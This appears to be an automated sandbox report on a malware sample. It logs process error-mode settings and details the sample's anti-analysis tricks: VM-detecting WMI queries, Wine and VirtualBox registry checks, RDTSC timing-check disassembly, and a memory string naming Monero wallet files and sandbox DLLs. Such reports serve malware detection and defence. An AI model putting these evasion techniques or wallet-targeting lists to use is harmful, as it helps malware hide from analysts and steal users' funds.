Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7wpHB_IZvVwIDf0EgO_TfPH6.exe.32b5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2753591127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gobEmOm5sr.exe PID: 7500, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:28:0516:28:0516:28:0516:28:0516:28:0516:28:05DELAYS.TMP%S%SNTDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E241C7 second address: E241CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E241CB second address: E241ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C24FD04D7h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2430E second address: E2431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jc 00007F8C2504F38Ch 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2431F second address: E2434E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C24FD04D5h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8C24FD04CDh 0x0000000f jno 00007F8C24FD04CCh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F8C24FD04CCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2434E second address: E24352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25E36 second address: E25E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8C24FD04CDh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jne 00007F8C24FD04C6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25E5E second address: E25E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jc 00007F8C2504F393h 0x00000013 jmp 00007F8C2504F38Dh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F8C2504F38Dh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25F6F second address: E25F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25F75 second address: E25FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d jmp 00007F8C2504F38Bh 0x00000012 pop eax 0x00000013 pop eax 0x00000014 js 00007F8C2504F3A3h 0x0000001a call 00007F8C2504F396h 0x0000001f jnl 00007F8C2504F386h 0x00000025 pop edi 0x00000026 push 00000003h 0x00000028 mov dh, bh 0x0000002a push 00000000h 0x0000002c mov cx, si 0x0000002f jnp 00007F8C2504F38Ch 0x00000035 or esi, dword ptr [ebp+122D3916h] 0x0000003b push 00000003h 0x0000003d call 00007F8C2504F38Eh 0x00000042 pop edx 0x00000043 push 8341DC5Eh 0x00000048 push edi 0x00000049 push esi 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E25FE1 second address: E26031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 add dword ptr [esp], 3CBE23A2h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8C24FD04C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 movzx edx, cx 0x0000002a lea ebx, dword ptr [ebp+12455D5Bh] 0x00000030 or si, 5728h 0x00000035 xchg eax, ebx 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8C24FD04D2h 0x0000003e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26031 second address: E2604B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8C2504F38Ch 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E260F7 second address: E2612D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, 0F4D857Ah 0x0000000f push 00000000h 0x00000011 ja 00007F8C24FD04CCh 0x00000017 call 00007F8C24FD04C9h 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8C24FD04CDh 0x00000024 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2612D second address: E26131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26131 second address: E2613E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2613E second address: E26170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jp 00007F8C2504F386h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push esi 0x00000016 pushad 0x00000017 jmp 00007F8C2504F399h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26170 second address: E2618F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F8C24FD04D1h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2618F second address: E26194 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26194 second address: E261B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F8C24FD04CEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261B3 second address: E261B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261B9 second address: E261BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E261BD second address: E26217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dl, 20h 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F8C2504F388h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D3B2Ah] 0x0000002d push 00000000h 0x0000002f jc 00007F8C2504F386h 0x00000035 push 00000003h 0x00000037 mov dword ptr [ebp+122D1A83h], ecx 0x0000003d push A033054Dh 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007F8C2504F38Ch 0x0000004a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26217 second address: E2621D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E2621D second address: E26221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E26351 second address: E263DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C24FD04CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 383032B6h 0x00000011 xor ch, FFFFFF8Bh 0x00000014 push 00000003h 0x00000016 call 00007F8C24FD04D2h 0x0000001b pop ecx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2D42h], ebx 0x00000024 push 00000003h 0x00000026 push edx 0x00000027 jmp 00007F8C24FD04D0h 0x0000002c pop ecx 0x0000002d call 00007F8C24FD04C9h 0x00000032 jo 00007F8C24FD04D2h 0x00000038 jnc 00007F8C24FD04CCh 0x0000003e push eax 0x0000003f jmp 00007F8C24FD04D8h 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jbe 00007F8C24FD04C6h 